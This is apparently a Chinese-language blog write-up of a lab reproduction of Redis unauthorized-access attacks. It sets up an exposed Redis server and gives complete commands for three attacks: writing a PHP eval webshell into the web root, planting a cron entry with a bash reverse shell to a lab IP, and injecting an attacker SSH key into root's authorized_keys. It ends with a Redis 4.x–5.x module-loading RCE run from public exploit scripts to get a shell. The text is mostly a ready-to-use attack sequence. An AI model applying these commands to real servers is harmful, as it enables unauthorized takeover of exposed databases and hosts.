redis漏洞利用

前言

在复现有关redis一些漏洞的时候，踩了许多坑。真正体会到复现的不易，远没有想的那么简单。"童话里的都是骗人的"。

redis的安装方式

apt 安装

ubuntu安装
apt install redis-server
并修改了配置文件，设置允许外部访问，关闭保护模式。

image.png

在save是出现了error。

image.png

查看许多资料后，redis默认以redis权限运行。

image.png

在修改权限为果后，才知道需要在redis.service里配置备份可读写的路径。
需要在/etc/systemd/system/redis.service
文件中加入 ReadWriteDirectories=-/var/www/html

image.png

运行systemctl daemon-reload命令后，重启redis服务。才可以保存成功。

image.png

这种以apt安装的方式出现多个坑点。
考虑到实际需要。选择以root权限wget下载redis后再安装。

wget安装

随意选择了一种版本
进行下载安装
运行以下命令

apt-get install gcc && make
wget http://download.redis.io/releases/redis-4.0.9.tar.gz
tar -zxvf  redis-4.0.9.tar.gz
cd redis-4.0.9
make

image.png

编译之后，进入src目录，将redis-server和redis-cli拷贝到/usr/bin目录下

cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ../
ls
cp redis.conf /etc/

修改redis.conf配置文件允许外部连接并关闭保护模式
1、bind 127.0.0.1 这行前面加注释(#)；
2、将redis.conf文件中的 protected-mode yes 改为no；

image.png image.png

redis-server  /etc/redis.conf  运行redis服务

image.png image.png

查看发现redis以root权限运行。且以这种方式安装redis在save时不会出现error。
到此，环境才搭建好。

未授权访问

在windows本机上运行redis-cli.exe客户端进行实验

webshell写入

命令如下

config set dir /var/www/html     设置web目录
config set dbfilename webshell.php  设置备份文件名
set shell "<?php @eval($_POST['shell']);?>"  设置值
save  保存

image.png

查看目录，发现成功写入。

image.png image.png
条件是存在web目录及知道网站绝对路径。

bash反弹

命令如下

config set dir /var/spool/cron
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/172.16.111.210/80 0>&1\n\n"
config set dbfilename root
save

测试在ubuntu下无法反弹，centos反弹成功。

image.png

原因已经有大佬说明啦:
这是由于redis向任务计划文件里写内容出现乱码而导致的语法错误，而乱码是避免不了的，centos会忽略乱码去执行格式正确的任务计划，而ubuntu并不会忽略这些乱码，所以导致命令执行失败
条件是centos反弹

ssh秘钥

以kali做攻击机。
kali运行

ssh-keygen -t rsa

在kali上生成一对秘钥
在安装redis的ubuntu机器上 继续安装openssh-server

apt install openssh-server

并修改/etc/ssh/sshd_config 配置文件后允许远程连接
且ubuntu必须要有/etc/.ssh文件，否则测试不成功
运行命令，可生成该文件

ssh localhost

环境搭建好后，可进行测试

1. (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt
将公钥写到centos的/root/.ssh/id_rsa文件
2. cat /root/.ssh/key.txt | redis-cli -h 172.16.111.196 -x set aaa
将刚刚生成的公钥设置给redis里的变量aaa
3.config set dir /root/.ssh 
设置备份地址
4.config  set  dbfilename authorized_keys
备份文件文件名

image.png

执行完毕后会在ubuntu服务器的/root/.ssh目录下生成一个authorized_keys的公钥文件，利用这个公钥文件就可以远程连接ubuntu了

image.png

ssh  172.16.111.196  ssh远程连接

image.png image.png

条件是ubuntu上需要存在/root/.ssh该文件

总结

以上就是redis未授权访问经常利用的三种方式。
复现后发现每种方式都有弊端，没有哪种方式通杀。
如果考虑实际情况的话，bash反弹还不错。

redis 4.0~5.0 rce漏洞

环境准备

kali(攻击机) 172.16.111.59 python redis exp 本地执行python脚本
ubuntu(靶机) 172.16.111.196 redis未授权访问漏洞
在kali上将exp下载

git clone https://github.com/Ridter/redis-rce.git
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git

编译so文件

cd RedisModules-ExecuteCommand/
ls
make

之后复制module.so到redis-rce目录下，然后运行命令

python redis-rce.py -r 172.16.111.196  -L 172.16.111.59 -f module.so

image.png

-r 参数是指远程目标Redis IP地址；
-L参数是指本地监听服务器IP地址；
执行命令后，开启监听了本地的8888端口，并成功反弹shell。

image.png image.png

比较鸡肋的是如果redis设置了密码将无法利用该漏洞。

参考资料
记一次失败漏洞利用的经历--ubuntu下的redis未授权访问漏洞复
Redis未授权访问漏洞复现与利用
Hackredis Enhanced Edition Script
Redis 4.x 5.x RCE